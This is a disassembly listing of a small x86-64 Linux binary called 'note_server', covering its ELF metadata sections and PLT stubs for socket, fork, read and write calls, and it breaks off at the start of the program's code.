
c_files/local/note_server:     file format elf64-x86-64


Disassembly of section .interp:

00000000000002a8 <.interp>:
 2a8:	2f                   	(bad)  
 2a9:	6c                   	insb   (%dx),%es:(%rdi)
 2aa:	69 62 36 34 2f 6c 64 	imul   $0x646c2f34,0x36(%rdx),%esp
 2b1:	2d 6c 69 6e 75       	sub    $0x756e696c,%eax
 2b6:	78 2d                	js     2e5 <_init-0xd1b>
 2b8:	78 38                	js     2f2 <_init-0xd0e>
 2ba:	36 2d 36 34 2e 73    	ss sub $0x732e3436,%eax
 2c0:	6f                   	outsl  %ds:(%rsi),(%dx)
 2c1:	2e 32 00             	xor    %cs:(%rax),%al

Disassembly of section .note.gnu.build-id:

00000000000002c4 <.note.gnu.build-id>:
 2c4:	04 00                	add    $0x0,%al
 2c6:	00 00                	add    %al,(%rax)
 2c8:	14 00                	adc    $0x0,%al
 2ca:	00 00                	add    %al,(%rax)
 2cc:	03 00                	add    (%rax),%eax
 2ce:	00 00                	add    %al,(%rax)
 2d0:	47                   	rex.RXB
 2d1:	4e 55                	rex.WRX push %rbp
 2d3:	00 04 e2             	add    %al,(%rdx,%riz,8)
 2d6:	fb                   	sti    
 2d7:	0b 31                	or     (%rcx),%esi
 2d9:	0a 4c 36 2d          	or     0x2d(%rsi,%rsi,1),%cl
 2dd:	d1 f4                	shl    %esp
 2df:	2f                   	(bad)  
 2e0:	8e 0c c4             	mov    (%rsp,%rax,8),%cs
 2e3:	a4                   	movsb  %ds:(%rsi),%es:(%rdi)
 2e4:	b1 d6                	mov    $0xd6,%cl
 2e6:	8c e9                	mov    %gs,%ecx

Disassembly of section .note.ABI-tag:

00000000000002e8 <.note.ABI-tag>:
 2e8:	04 00                	add    $0x0,%al
 2ea:	00 00                	add    %al,(%rax)
 2ec:	10 00                	adc    %al,(%rax)
 2ee:	00 00                	add    %al,(%rax)
 2f0:	01 00                	add    %eax,(%rax)
 2f2:	00 00                	add    %al,(%rax)
 2f4:	47                   	rex.RXB
 2f5:	4e 55                	rex.WRX push %rbp
 2f7:	00 00                	add    %al,(%rax)
 2f9:	00 00                	add    %al,(%rax)
 2fb:	00 03                	add    %al,(%rbx)
 2fd:	00 00                	add    %al,(%rax)
 2ff:	00 02                	add    %al,(%rdx)
 301:	00 00                	add    %al,(%rax)
 303:	00 00                	add    %al,(%rax)
 305:	00 00                	add    %al,(%rax)
	...

Disassembly of section .gnu.hash:

0000000000000308 <.gnu.hash>:
 308:	02 00                	add    (%rax),%al
 30a:	00 00                	add    %al,(%rax)
 30c:	15 00 00 00 01       	adc    $0x1000000,%eax
 311:	00 00                	add    %al,(%rax)
 313:	00 06                	add    %al,(%rsi)
 315:	00 00                	add    %al,(%rax)
 317:	00 00                	add    %al,(%rax)
 319:	00 81 00 00 00 00    	add    %al,0x0(%rcx)
 31f:	00 15 00 00 00 00    	add    %dl,0x0(%rip)        # 325 <_init-0xcdb>
 325:	00 00                	add    %al,(%rax)
 327:	00 d1                	add    %dl,%cl
 329:	65 ce                	gs (bad) 
 32b:	6d                   	insl   (%dx),%es:(%rdi)

Disassembly of section .dynsym:

0000000000000330 <.dynsym>:
	...
 348:	c6 00 00             	movb   $0x0,(%rax)
 34b:	00 20                	add    %ah,(%rax)
	...
 35d:	00 00                	add    %al,(%rax)
 35f:	00 67 00             	add    %ah,0x0(%rdi)
 362:	00 00                	add    %al,(%rax)
 364:	12 00                	adc    (%rax),%al
	...
 376:	00 00                	add    %al,(%rax)
 378:	5c                   	pop    %rsp
 379:	00 00                	add    %al,(%rax)
 37b:	00 12                	add    %dl,(%rdx)
	...
 38d:	00 00                	add    %al,(%rax)
 38f:	00 9f 00 00 00 12    	add    %bl,0x12000000(%rdi)
	...
 3a5:	00 00                	add    %al,(%rax)
 3a7:	00 29                	add    %ch,(%rcx)
 3a9:	00 00                	add    %al,(%rax)
 3ab:	00 12                	add    %dl,(%rdx)
	...
 3bd:	00 00                	add    %al,(%rax)
 3bf:	00 17                	add    %dl,(%rdi)
 3c1:	00 00                	add    %al,(%rax)
 3c3:	00 12                	add    %dl,(%rdx)
	...
 3d5:	00 00                	add    %al,(%rax)
 3d7:	00 71 00             	add    %dh,0x0(%rcx)
 3da:	00 00                	add    %al,(%rax)
 3dc:	12 00                	adc    (%rax),%al
	...
 3ee:	00 00                	add    %al,(%rax)
 3f0:	46 00 00             	rex.RX add %r8b,(%rax)
 3f3:	00 12                	add    %dl,(%rdx)
	...
 405:	00 00                	add    %al,(%rax)
 407:	00 8d 00 00 00 12    	add    %cl,0x12000000(%rbp)
	...
 41d:	00 00                	add    %al,(%rax)
 41f:	00 4b 00             	add    %cl,0x0(%rbx)
 422:	00 00                	add    %al,(%rax)
 424:	12 00                	adc    (%rax),%al
	...
 436:	00 00                	add    %al,(%rax)
 438:	e2 00                	loop   43a <_init-0xbc6>
 43a:	00 00                	add    %al,(%rax)
 43c:	20 00                	and    %al,(%rax)
	...
 44e:	00 00                	add    %al,(%rax)
 450:	55                   	push   %rbp
 451:	00 00                	add    %al,(%rax)
 453:	00 12                	add    %dl,(%rdx)
	...
 465:	00 00                	add    %al,(%rax)
 467:	00 3a                	add    %bh,(%rdx)
 469:	00 00                	add    %al,(%rax)
 46b:	00 12                	add    %dl,(%rdx)
	...
 47d:	00 00                	add    %al,(%rax)
 47f:	00 41 00             	add    %al,0x0(%rcx)
 482:	00 00                	add    %al,(%rax)
 484:	12 00                	adc    (%rax),%al
	...
 496:	00 00                	add    %al,(%rax)
 498:	1d 00 00 00 12       	sbb    $0x12000000,%eax
	...
 4ad:	00 00                	add    %al,(%rax)
 4af:	00 77 00             	add    %dh,0x0(%rdi)
 4b2:	00 00                	add    %al,(%rax)
 4b4:	12 00                	adc    (%rax),%al
	...
 4c6:	00 00                	add    %al,(%rax)
 4c8:	12 00                	adc    (%rax),%al
 4ca:	00 00                	add    %al,(%rax)
 4cc:	12 00                	adc    (%rax),%al
	...
 4de:	00 00                	add    %al,(%rax)
 4e0:	f1                   	icebp  
 4e1:	00 00                	add    %al,(%rax)
 4e3:	00 20                	add    %ah,(%rax)
	...
 4f5:	00 00                	add    %al,(%rax)
 4f7:	00 24 00             	add    %ah,(%rax,%rax,1)
 4fa:	00 00                	add    %al,(%rax)
 4fc:	12 00                	adc    (%rax),%al
	...
 50e:	00 00                	add    %al,(%rax)
 510:	0b 00                	or     (%rax),%eax
 512:	00 00                	add    %al,(%rax)
 514:	12 00                	adc    (%rax),%al
	...
 526:	00 00                	add    %al,(%rax)
 528:	7e 00                	jle    52a <_init-0xad6>
 52a:	00 00                	add    %al,(%rax)
 52c:	22 00                	and    (%rax),%al
	...

Disassembly of section .dynstr:

0000000000000540 <.dynstr>:
 540:	00 6c 69 62          	add    %ch,0x62(%rcx,%rbp,2)
 544:	63 2e                	movslq (%rsi),%ebp
 546:	73 6f                	jae    5b7 <_init-0xa49>
 548:	2e 36 00 73 6f       	cs add %dh,%ss:0x6f(%rbx)
 54d:	63 6b 65             	movslq 0x65(%rbx),%ebp
 550:	74 00                	je     552 <_init-0xaae>
 552:	65 78 69             	gs js  5be <_init-0xa42>
 555:	74 00                	je     557 <_init-0xaa9>
 557:	68 74 6f 6e 73       	pushq  $0x736e6f74
 55c:	00 70 65             	add    %dh,0x65(%rax)
 55f:	72 72                	jb     5d3 <_init-0xa2d>
 561:	6f                   	outsl  %ds:(%rsi),(%dx)
 562:	72 00                	jb     564 <_init-0xa9c>
 564:	66 6f                	outsw  %ds:(%rsi),(%dx)
 566:	72 6b                	jb     5d3 <_init-0xa2d>
 568:	00 5f 5f             	add    %bl,0x5f(%rdi)
 56b:	73 74                	jae    5e1 <_init-0xa1f>
 56d:	61                   	(bad)  
 56e:	63 6b 5f             	movslq 0x5f(%rbx),%ebp
 571:	63 68 6b             	movslq 0x6b(%rax),%ebp
 574:	5f                   	pop    %rdi
 575:	66 61                	data16 (bad) 
 577:	69 6c 00 6c 69 73 74 	imul   $0x65747369,0x6c(%rax,%rax,1),%ebp
 57e:	65 
 57f:	6e                   	outsb  %ds:(%rsi),(%dx)
 580:	00 62 69             	add    %ah,0x69(%rdx)
 583:	6e                   	outsb  %ds:(%rsi),(%dx)
 584:	64 00 72 65          	add    %dh,%fs:0x65(%rdx)
 588:	61                   	(bad)  
 589:	64 00 69 6e          	add    %ch,%fs:0x6e(%rcx)
 58d:	65 74 5f             	gs je  5ef <_init-0xa11>
 590:	61                   	(bad)  
 591:	64 64 72 00          	fs fs jb 595 <_init-0xa6b>
 595:	6d                   	insl   (%dx),%es:(%rdi)
 596:	65 6d                	gs insl (%dx),%es:(%rdi)
 598:	63 70 79             	movslq 0x79(%rax),%esi
 59b:	00 73 65             	add    %dh,0x65(%rbx)
 59e:	74 73                	je     613 <_init-0x9ed>
 5a0:	6f                   	outsl  %ds:(%rsi),(%dx)
 5a1:	63 6b 6f             	movslq 0x6f(%rbx),%ebp
 5a4:	70 74                	jo     61a <_init-0x9e6>
 5a6:	00 73 69             	add    %dh,0x69(%rbx)
 5a9:	67 61                	addr32 (bad) 
 5ab:	63 74 69 6f          	movslq 0x6f(%rcx,%rbp,2),%esi
 5af:	6e                   	outsb  %ds:(%rsi),(%dx)
 5b0:	00 63 6c             	add    %ah,0x6c(%rbx)
 5b3:	6f                   	outsl  %ds:(%rsi),(%dx)
 5b4:	73 65                	jae    61b <_init-0x9e5>
 5b6:	00 61 63             	add    %ah,0x63(%rcx)
 5b9:	63 65 70             	movslq 0x70(%rbp),%esp
 5bc:	74 00                	je     5be <_init-0xa42>
 5be:	5f                   	pop    %rdi
 5bf:	5f                   	pop    %rdi
 5c0:	63 78 61             	movslq 0x61(%rax),%edi
 5c3:	5f                   	pop    %rdi
 5c4:	66 69 6e 61 6c 69    	imul   $0x696c,0x61(%rsi),%bp
 5ca:	7a 65                	jp     631 <_init-0x9cf>
 5cc:	00 5f 5f             	add    %bl,0x5f(%rdi)
 5cf:	6c                   	insb   (%dx),%es:(%rdi)
 5d0:	69 62 63 5f 73 74 61 	imul   $0x6174735f,0x63(%rdx),%esp
 5d7:	72 74                	jb     64d <_init-0x9b3>
 5d9:	5f                   	pop    %rdi
 5da:	6d                   	insl   (%dx),%es:(%rdi)
 5db:	61                   	(bad)  
 5dc:	69 6e 00 77 72 69 74 	imul   $0x74697277,0x0(%rsi),%ebp
 5e3:	65 00 47 4c          	add    %al,%gs:0x4c(%rdi)
 5e7:	49                   	rex.WB
 5e8:	42                   	rex.X
 5e9:	43 5f                	rex.XB pop %r15
 5eb:	32 2e                	xor    (%rsi),%ch
 5ed:	31 34 00             	xor    %esi,(%rax,%rax,1)
 5f0:	47                   	rex.RXB
 5f1:	4c                   	rex.WR
 5f2:	49                   	rex.WB
 5f3:	42                   	rex.X
 5f4:	43 5f                	rex.XB pop %r15
 5f6:	32 2e                	xor    (%rsi),%ch
 5f8:	34 00                	xor    $0x0,%al
 5fa:	47                   	rex.RXB
 5fb:	4c                   	rex.WR
 5fc:	49                   	rex.WB
 5fd:	42                   	rex.X
 5fe:	43 5f                	rex.XB pop %r15
 600:	32 2e                	xor    (%rsi),%ch
 602:	32 2e                	xor    (%rsi),%ch
 604:	35 00 5f 49 54       	xor    $0x54495f00,%eax
 609:	4d 5f                	rex.WRB pop %r15
 60b:	64 65 72 65          	fs gs jb 674 <_init-0x98c>
 60f:	67 69 73 74 65 72 54 	imul   $0x4d547265,0x74(%ebx),%esi
 616:	4d 
 617:	43 6c                	rex.XB insb (%dx),%es:(%rdi)
 619:	6f                   	outsl  %ds:(%rsi),(%dx)
 61a:	6e                   	outsb  %ds:(%rsi),(%dx)
 61b:	65 54                	gs push %rsp
 61d:	61                   	(bad)  
 61e:	62                   	(bad)  
 61f:	6c                   	insb   (%dx),%es:(%rdi)
 620:	65 00 5f 5f          	add    %bl,%gs:0x5f(%rdi)
 624:	67 6d                	insl   (%dx),%es:(%edi)
 626:	6f                   	outsl  %ds:(%rsi),(%dx)
 627:	6e                   	outsb  %ds:(%rsi),(%dx)
 628:	5f                   	pop    %rdi
 629:	73 74                	jae    69f <_init-0x961>
 62b:	61                   	(bad)  
 62c:	72 74                	jb     6a2 <_init-0x95e>
 62e:	5f                   	pop    %rdi
 62f:	5f                   	pop    %rdi
 630:	00 5f 49             	add    %bl,0x49(%rdi)
 633:	54                   	push   %rsp
 634:	4d 5f                	rex.WRB pop %r15
 636:	72 65                	jb     69d <_init-0x963>
 638:	67 69 73 74 65 72 54 	imul   $0x4d547265,0x74(%ebx),%esi
 63f:	4d 
 640:	43 6c                	rex.XB insb (%dx),%es:(%rdi)
 642:	6f                   	outsl  %ds:(%rsi),(%dx)
 643:	6e                   	outsb  %ds:(%rsi),(%dx)
 644:	65 54                	gs push %rsp
 646:	61                   	(bad)  
 647:	62                   	.byte 0x62
 648:	6c                   	insb   (%dx),%es:(%rdi)
 649:	65                   	gs
	...

Disassembly of section .gnu.version:

000000000000064c <.gnu.version>:
 64c:	00 00                	add    %al,(%rax)
 64e:	00 00                	add    %al,(%rax)
 650:	02 00                	add    (%rax),%al
 652:	02 00                	add    (%rax),%al
 654:	02 00                	add    (%rax),%al
 656:	03 00                	add    (%rax),%eax
 658:	02 00                	add    (%rax),%al
 65a:	02 00                	add    (%rax),%al
 65c:	02 00                	add    (%rax),%al
 65e:	02 00                	add    (%rax),%al
 660:	02 00                	add    (%rax),%al
 662:	00 00                	add    %al,(%rax)
 664:	04 00                	add    $0x0,%al
 666:	02 00                	add    (%rax),%al
 668:	02 00                	add    (%rax),%al
 66a:	02 00                	add    (%rax),%al
 66c:	02 00                	add    (%rax),%al
 66e:	02 00                	add    (%rax),%al
 670:	00 00                	add    %al,(%rax)
 672:	02 00                	add    (%rax),%al
 674:	02 00                	add    (%rax),%al
 676:	02 00                	add    (%rax),%al

Disassembly of section .gnu.version_r:

0000000000000678 <.gnu.version_r>:
 678:	01 00                	add    %eax,(%rax)
 67a:	03 00                	add    (%rax),%eax
 67c:	01 00                	add    %eax,(%rax)
 67e:	00 00                	add    %al,(%rax)
 680:	10 00                	adc    %al,(%rax)
 682:	00 00                	add    %al,(%rax)
 684:	00 00                	add    %al,(%rax)
 686:	00 00                	add    %al,(%rax)
 688:	94                   	xchg   %eax,%esp
 689:	91                   	xchg   %eax,%ecx
 68a:	96                   	xchg   %eax,%esi
 68b:	06                   	(bad)  
 68c:	00 00                	add    %al,(%rax)
 68e:	04 00                	add    $0x0,%al
 690:	a5                   	movsl  %ds:(%rsi),%es:(%rdi)
 691:	00 00                	add    %al,(%rax)
 693:	00 10                	add    %dl,(%rax)
 695:	00 00                	add    %al,(%rax)
 697:	00 14 69             	add    %dl,(%rcx,%rbp,2)
 69a:	69 0d 00 00 03 00 b0 	imul   $0xb0,0x30000(%rip),%ecx        # 306a4 <_end+0x2c68c>
 6a1:	00 00 00 
 6a4:	10 00                	adc    %al,(%rax)
 6a6:	00 00                	add    %al,(%rax)
 6a8:	75 1a                	jne    6c4 <_init-0x93c>
 6aa:	69 09 00 00 02 00    	imul   $0x20000,(%rcx),%ecx
 6b0:	ba 00 00 00 00       	mov    $0x0,%edx
 6b5:	00 00                	add    %al,(%rax)
	...

Disassembly of section .rela.dyn:

00000000000006b8 <.rela.dyn>:
 6b8:	40 3d 00 00 00 00    	rex cmp $0x0,%eax
 6be:	00 00                	add    %al,(%rax)
 6c0:	08 00                	or     %al,(%rax)
 6c2:	00 00                	add    %al,(%rax)
 6c4:	00 00                	add    %al,(%rax)
 6c6:	00 00                	add    %al,(%rax)
 6c8:	20 12                	and    %dl,(%rdx)
 6ca:	00 00                	add    %al,(%rax)
 6cc:	00 00                	add    %al,(%rax)
 6ce:	00 00                	add    %al,(%rax)
 6d0:	48 3d 00 00 00 00    	cmp    $0x0,%rax
 6d6:	00 00                	add    %al,(%rax)
 6d8:	08 00                	or     %al,(%rax)
 6da:	00 00                	add    %al,(%rax)
 6dc:	00 00                	add    %al,(%rax)
 6de:	00 00                	add    %al,(%rax)
 6e0:	e0 11                	loopne 6f3 <_init-0x90d>
 6e2:	00 00                	add    %al,(%rax)
 6e4:	00 00                	add    %al,(%rax)
 6e6:	00 00                	add    %al,(%rax)
 6e8:	08 40 00             	or     %al,0x0(%rax)
 6eb:	00 00                	add    %al,(%rax)
 6ed:	00 00                	add    %al,(%rax)
 6ef:	00 08                	add    %cl,(%rax)
 6f1:	00 00                	add    %al,(%rax)
 6f3:	00 00                	add    %al,(%rax)
 6f5:	00 00                	add    %al,(%rax)
 6f7:	00 08                	add    %cl,(%rax)
 6f9:	40 00 00             	add    %al,(%rax)
 6fc:	00 00                	add    %al,(%rax)
 6fe:	00 00                	add    %al,(%rax)
 700:	d8 3f                	fdivrs (%rdi)
 702:	00 00                	add    %al,(%rax)
 704:	00 00                	add    %al,(%rax)
 706:	00 00                	add    %al,(%rax)
 708:	06                   	(bad)  
 709:	00 00                	add    %al,(%rax)
 70b:	00 01                	add    %al,(%rcx)
	...
 715:	00 00                	add    %al,(%rax)
 717:	00 e0                	add    %ah,%al
 719:	3f                   	(bad)  
 71a:	00 00                	add    %al,(%rax)
 71c:	00 00                	add    %al,(%rax)
 71e:	00 00                	add    %al,(%rax)
 720:	06                   	(bad)  
 721:	00 00                	add    %al,(%rax)
 723:	00 09                	add    %cl,(%rcx)
	...
 72d:	00 00                	add    %al,(%rax)
 72f:	00 e8                	add    %ch,%al
 731:	3f                   	(bad)  
 732:	00 00                	add    %al,(%rax)
 734:	00 00                	add    %al,(%rax)
 736:	00 00                	add    %al,(%rax)
 738:	06                   	(bad)  
 739:	00 00                	add    %al,(%rax)
 73b:	00 0b                	add    %cl,(%rbx)
	...
 745:	00 00                	add    %al,(%rax)
 747:	00 f0                	add    %dh,%al
 749:	3f                   	(bad)  
 74a:	00 00                	add    %al,(%rax)
 74c:	00 00                	add    %al,(%rax)
 74e:	00 00                	add    %al,(%rax)
 750:	06                   	(bad)  
 751:	00 00                	add    %al,(%rax)
 753:	00 12                	add    %dl,(%rdx)
	...
 75d:	00 00                	add    %al,(%rax)
 75f:	00 f8                	add    %bh,%al
 761:	3f                   	(bad)  
 762:	00 00                	add    %al,(%rax)
 764:	00 00                	add    %al,(%rax)
 766:	00 00                	add    %al,(%rax)
 768:	06                   	(bad)  
 769:	00 00                	add    %al,(%rax)
 76b:	00 15 00 00 00 00    	add    %dl,0x0(%rip)        # 771 <_init-0x88f>
 771:	00 00                	add    %al,(%rax)
 773:	00 00                	add    %al,(%rax)
 775:	00 00                	add    %al,(%rax)
	...

Disassembly of section .rela.plt:

0000000000000778 <.rela.plt>:
 778:	58                   	pop    %rax
 779:	3f                   	(bad)  
 77a:	00 00                	add    %al,(%rax)
 77c:	00 00                	add    %al,(%rax)
 77e:	00 00                	add    %al,(%rax)
 780:	07                   	(bad)  
 781:	00 00                	add    %al,(%rax)
 783:	00 02                	add    %al,(%rdx)
	...
 78d:	00 00                	add    %al,(%rax)
 78f:	00 60 3f             	add    %ah,0x3f(%rax)
 792:	00 00                	add    %al,(%rax)
 794:	00 00                	add    %al,(%rax)
 796:	00 00                	add    %al,(%rax)
 798:	07                   	(bad)  
 799:	00 00                	add    %al,(%rax)
 79b:	00 03                	add    %al,(%rbx)
	...
 7a5:	00 00                	add    %al,(%rax)
 7a7:	00 68 3f             	add    %ch,0x3f(%rax)
 7aa:	00 00                	add    %al,(%rax)
 7ac:	00 00                	add    %al,(%rax)
 7ae:	00 00                	add    %al,(%rax)
 7b0:	07                   	(bad)  
 7b1:	00 00                	add    %al,(%rax)
 7b3:	00 04 00             	add    %al,(%rax,%rax,1)
	...
 7be:	00 00                	add    %al,(%rax)
 7c0:	70 3f                	jo     801 <_init-0x7ff>
 7c2:	00 00                	add    %al,(%rax)
 7c4:	00 00                	add    %al,(%rax)
 7c6:	00 00                	add    %al,(%rax)
 7c8:	07                   	(bad)  
 7c9:	00 00                	add    %al,(%rax)
 7cb:	00 05 00 00 00 00    	add    %al,0x0(%rip)        # 7d1 <_init-0x82f>
 7d1:	00 00                	add    %al,(%rax)
 7d3:	00 00                	add    %al,(%rax)
 7d5:	00 00                	add    %al,(%rax)
 7d7:	00 78 3f             	add    %bh,0x3f(%rax)
 7da:	00 00                	add    %al,(%rax)
 7dc:	00 00                	add    %al,(%rax)
 7de:	00 00                	add    %al,(%rax)
 7e0:	07                   	(bad)  
 7e1:	00 00                	add    %al,(%rax)
 7e3:	00 06                	add    %al,(%rsi)
	...
 7ed:	00 00                	add    %al,(%rax)
 7ef:	00 80 3f 00 00 00    	add    %al,0x3f(%rax)
 7f5:	00 00                	add    %al,(%rax)
 7f7:	00 07                	add    %al,(%rdi)
 7f9:	00 00                	add    %al,(%rax)
 7fb:	00 07                	add    %al,(%rdi)
	...
 805:	00 00                	add    %al,(%rax)
 807:	00 88 3f 00 00 00    	add    %cl,0x3f(%rax)
 80d:	00 00                	add    %al,(%rax)
 80f:	00 07                	add    %al,(%rdi)
 811:	00 00                	add    %al,(%rax)
 813:	00 08                	add    %cl,(%rax)
	...
 81d:	00 00                	add    %al,(%rax)
 81f:	00 90 3f 00 00 00    	add    %dl,0x3f(%rax)
 825:	00 00                	add    %al,(%rax)
 827:	00 07                	add    %al,(%rdi)
 829:	00 00                	add    %al,(%rax)
 82b:	00 0a                	add    %cl,(%rdx)
	...
 835:	00 00                	add    %al,(%rax)
 837:	00 98 3f 00 00 00    	add    %bl,0x3f(%rax)
 83d:	00 00                	add    %al,(%rax)
 83f:	00 07                	add    %al,(%rdi)
 841:	00 00                	add    %al,(%rax)
 843:	00 0c 00             	add    %cl,(%rax,%rax,1)
	...
 84e:	00 00                	add    %al,(%rax)
 850:	a0 3f 00 00 00 00 00 	movabs 0x70000000000003f,%al
 857:	00 07 
 859:	00 00                	add    %al,(%rax)
 85b:	00 0d 00 00 00 00    	add    %cl,0x0(%rip)        # 861 <_init-0x79f>
 861:	00 00                	add    %al,(%rax)
 863:	00 00                	add    %al,(%rax)
 865:	00 00                	add    %al,(%rax)
 867:	00 a8 3f 00 00 00    	add    %ch,0x3f(%rax)
 86d:	00 00                	add    %al,(%rax)
 86f:	00 07                	add    %al,(%rdi)
 871:	00 00                	add    %al,(%rax)
 873:	00 0e                	add    %cl,(%rsi)
	...
 87d:	00 00                	add    %al,(%rax)
 87f:	00 b0 3f 00 00 00    	add    %dh,0x3f(%rax)
 885:	00 00                	add    %al,(%rax)
 887:	00 07                	add    %al,(%rdi)
 889:	00 00                	add    %al,(%rax)
 88b:	00 0f                	add    %cl,(%rdi)
	...
 895:	00 00                	add    %al,(%rax)
 897:	00 b8 3f 00 00 00    	add    %bh,0x3f(%rax)
 89d:	00 00                	add    %al,(%rax)
 89f:	00 07                	add    %al,(%rdi)
 8a1:	00 00                	add    %al,(%rax)
 8a3:	00 10                	add    %dl,(%rax)
	...
 8ad:	00 00                	add    %al,(%rax)
 8af:	00 c0                	add    %al,%al
 8b1:	3f                   	(bad)  
 8b2:	00 00                	add    %al,(%rax)
 8b4:	00 00                	add    %al,(%rax)
 8b6:	00 00                	add    %al,(%rax)
 8b8:	07                   	(bad)  
 8b9:	00 00                	add    %al,(%rax)
 8bb:	00 11                	add    %dl,(%rcx)
	...
 8c5:	00 00                	add    %al,(%rax)
 8c7:	00 c8                	add    %cl,%al
 8c9:	3f                   	(bad)  
 8ca:	00 00                	add    %al,(%rax)
 8cc:	00 00                	add    %al,(%rax)
 8ce:	00 00                	add    %al,(%rax)
 8d0:	07                   	(bad)  
 8d1:	00 00                	add    %al,(%rax)
 8d3:	00 13                	add    %dl,(%rbx)
	...
 8dd:	00 00                	add    %al,(%rax)
 8df:	00 d0                	add    %dl,%al
 8e1:	3f                   	(bad)  
 8e2:	00 00                	add    %al,(%rax)
 8e4:	00 00                	add    %al,(%rax)
 8e6:	00 00                	add    %al,(%rax)
 8e8:	07                   	(bad)  
 8e9:	00 00                	add    %al,(%rax)
 8eb:	00 14 00             	add    %dl,(%rax,%rax,1)
	...

Disassembly of section .init:

0000000000001000 <_init>:
    1000:	48 83 ec 08          	sub    $0x8,%rsp
    1004:	48 8b 05 dd 2f 00 00 	mov    0x2fdd(%rip),%rax        # 3fe8 <__gmon_start__>
    100b:	48 85 c0             	test   %rax,%rax
    100e:	74 02                	je     1012 <_init+0x12>
    1010:	ff d0                	callq  *%rax
    1012:	48 83 c4 08          	add    $0x8,%rsp
    1016:	c3                   	retq   

Disassembly of section .plt:

0000000000001020 <.plt>:
    1020:	ff 35 22 2f 00 00    	pushq  0x2f22(%rip)        # 3f48 <_GLOBAL_OFFSET_TABLE_+0x8>
    1026:	ff 25 24 2f 00 00    	jmpq   *0x2f24(%rip)        # 3f50 <_GLOBAL_OFFSET_TABLE_+0x10>
    102c:	0f 1f 40 00          	nopl   0x0(%rax)

0000000000001030 <sigaction@plt>:
    1030:	ff 25 22 2f 00 00    	jmpq   *0x2f22(%rip)        # 3f58 <sigaction@GLIBC_2.2.5>
    1036:	68 00 00 00 00       	pushq  $0x0
    103b:	e9 e0 ff ff ff       	jmpq   1020 <.plt>

0000000000001040 <setsockopt@plt>:
    1040:	ff 25 1a 2f 00 00    	jmpq   *0x2f1a(%rip)        # 3f60 <setsockopt@GLIBC_2.2.5>
    1046:	68 01 00 00 00       	pushq  $0x1
    104b:	e9 d0 ff ff ff       	jmpq   1020 <.plt>

0000000000001050 <write@plt>:
    1050:	ff 25 12 2f 00 00    	jmpq   *0x2f12(%rip)        # 3f68 <write@GLIBC_2.2.5>
    1056:	68 02 00 00 00       	pushq  $0x2
    105b:	e9 c0 ff ff ff       	jmpq   1020 <.plt>

0000000000001060 <__stack_chk_fail@plt>:
    1060:	ff 25 0a 2f 00 00    	jmpq   *0x2f0a(%rip)        # 3f70 <__stack_chk_fail@GLIBC_2.4>
    1066:	68 03 00 00 00       	pushq  $0x3
    106b:	e9 b0 ff ff ff       	jmpq   1020 <.plt>

0000000000001070 <htons@plt>:
    1070:	ff 25 02 2f 00 00    	jmpq   *0x2f02(%rip)        # 3f78 <htons@GLIBC_2.2.5>
    1076:	68 04 00 00 00       	pushq  $0x4
    107b:	e9 a0 ff ff ff       	jmpq   1020 <.plt>

0000000000001080 <close@plt>:
    1080:	ff 25 fa 2e 00 00    	jmpq   *0x2efa(%rip)        # 3f80 <close@GLIBC_2.2.5>
    1086:	68 05 00 00 00       	pushq  $0x5
    108b:	e9 90 ff ff ff       	jmpq   1020 <.plt>

0000000000001090 <read@plt>:
    1090:	ff 25 f2 2e 00 00    	jmpq   *0x2ef2(%rip)        # 3f88 <read@GLIBC_2.2.5>
    1096:	68 06 00 00 00       	pushq  $0x6
    109b:	e9 80 ff ff ff       	jmpq   1020 <.plt>

00000000000010a0 <inet_addr@plt>:
    10a0:	ff 25 ea 2e 00 00    	jmpq   *0x2eea(%rip)        # 3f90 <inet_addr@GLIBC_2.2.5>
    10a6:	68 07 00 00 00       	pushq  $0x7
    10ab:	e9 70 ff ff ff       	jmpq   1020 <.plt>

00000000000010b0 <memcpy@plt>:
    10b0:	ff 25 e2 2e 00 00    	jmpq   *0x2ee2(%rip)        # 3f98 <memcpy@GLIBC_2.14>
    10b6:	68 08 00 00 00       	pushq  $0x8
    10bb:	e9 60 ff ff ff       	jmpq   1020 <.plt>

00000000000010c0 <listen@plt>:
    10c0:	ff 25 da 2e 00 00    	jmpq   *0x2eda(%rip)        # 3fa0 <listen@GLIBC_2.2.5>
    10c6:	68 09 00 00 00       	pushq  $0x9
    10cb:	e9 50 ff ff ff       	jmpq   1020 <.plt>

00000000000010d0 <bind@plt>:
    10d0:	ff 25 d2 2e 00 00    	jmpq   *0x2ed2(%rip)        # 3fa8 <bind@GLIBC_2.2.5>
    10d6:	68 0a 00 00 00       	pushq  $0xa
    10db:	e9 40 ff ff ff       	jmpq   1020 <.plt>

00000000000010e0 <perror@plt>:
    10e0:	ff 25 ca 2e 00 00    	jmpq   *0x2eca(%rip)        # 3fb0 <perror@GLIBC_2.2.5>
    10e6:	68 0b 00 00 00       	pushq  $0xb
    10eb:	e9 30 ff ff ff       	jmpq   1020 <.plt>

00000000000010f0 <accept@plt>:
    10f0:	ff 25 c2 2e 00 00    	jmpq   *0x2ec2(%rip)        # 3fb8 <accept@GLIBC_2.2.5>
    10f6:	68 0c 00 00 00       	pushq  $0xc
    10fb:	e9 20 ff ff ff       	jmpq   1020 <.plt>

0000000000001100 <exit@plt>:
    1100:	ff 25 ba 2e 00 00    	jmpq   *0x2eba(%rip)        # 3fc0 <exit@GLIBC_2.2.5>
    1106:	68 0d 00 00 00       	pushq  $0xd
    110b:	e9 10 ff ff ff       	jmpq   1020 <.plt>

0000000000001110 <fork@plt>:
    1110:	ff 25 b2 2e 00 00    	jmpq   *0x2eb2(%rip)        # 3fc8 <fork@GLIBC_2.2.5>
    1116:	68 0e 00 00 00       	pushq  $0xe
    111b:	e9 00 ff ff ff       	jmpq   1020 <.plt>

0000000000001120 <socket@plt>:
    1120:	ff 25 aa 2e 00 00    	jmpq   *0x2eaa(%rip)        # 3fd0 <socket@GLIBC_2.2.5>
    1126:	68 0f 00 00 00       	pushq  $0xf
    112b:	e9 f0 fe ff ff       	jmpq   1020 <.plt>

Disassembly of section .plt.got:

0000000000001130 <__cxa_finalize@plt>:
    1130:	ff 25 c2 2e 00 00    	jmpq   *0x2ec2(%rip)        # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1136:	66 90                	xchg   %ax,%ax

Disassembly of section .text:

0000000000001140 <_start>:
    1140:	31 ed                	xor    %ebp,%ebp
    1142:	49 89 d1             	mov    %rdx,%r9
    1145:	5e                   	pop    %rsi
    1146:	48 89 e2             	mov    %rsp,%rdx
    1149:	48 83 e4 f0          	and    $0xfffffffffffffff0,%rsp
    114d:	50                   	push   %rax
    114e:	54                   	push   %rsp
